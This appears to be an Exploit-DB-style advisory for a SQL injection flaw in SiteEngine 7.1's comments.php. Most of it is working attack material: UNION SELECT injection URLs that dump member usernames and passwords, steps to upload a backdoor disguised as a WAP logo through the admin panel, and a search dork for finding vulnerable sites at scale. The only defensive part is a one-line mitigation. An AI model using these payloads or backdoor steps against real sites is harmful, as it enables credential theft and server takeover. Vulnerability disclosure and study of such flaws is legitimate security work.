SiteEngine 7.1 SQL injection Vulnerability

vendor:

SiteEngine

by:

Beach

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: SiteEngine

Affected Version From: 7.1

Affected Version To: 7.1

Patch Exists: NO

Related CWE: N/A

CPE: a:siteengine:siteengine:7.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2010

SiteEngine 7.1 SQL injection Vulnerability

Exploit this vulnerability comment must be enabled (default == enable). Enterprise Portal Version: http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23 and http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23. E-commerce Version: http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23. Upload backdoor: Administrator Panel: http://server/admin/ System maintainance -> WAP Setting -> plz upload WAP logo(<= 10kb) -> OK -> Browse Right Now -> view properties [the URL is Ur backdoor].

Mitigation:

Ensure that comment feature is disabled by default and only enabled when necessary.

Source

Exploit-DB raw data:

#################################################################################
#Title:   SiteEngine 7.1 SQL injection Vulnerability
#Date:    2010-11-25
#Author:  Beach
#Team:    www.linux520.com
#Vendor:  www.siteengine.net  www.boka.cn
#Dork:    "Powered by SiteEngine"   //300,000 +~
#Language:PHP
#Greetz:  birdarmy
#################################################################################
[*]Description:
   Exploit this vulnerability comment must be enabled (default == enable)
#################################################################################
[*]Exploit:

Enterprise Portal Version:
[1]http://server/comments.php?id=1&module=newstopic+m,boka_newstopicclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,38,39+from+boka_members%23

[2]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,concat(username,0x3a,password),4,5,6,...,26,27+from+boka_members%23

maybe have a different number of columns , you can try it ...
==================================================================================
E-commerce Version:

[+]http://server/comments.php?id=1&module=news+m,boka_newsclass+c+where+1=2+union+select+1,2,password,4,5,6,...,37,38+from+boka_members%23
##################################################################################

Similar to other versions  =)
##################################################################################
[*]Upload backdoor:
Administrator Panel: http://server/admin/

System maintainance -> WAP Setting -> plz upload WAP logo(<= 10kb) -> OK -> 
Browse Right Now -> view properties [the URL is Ur backdoor]
##################################################################################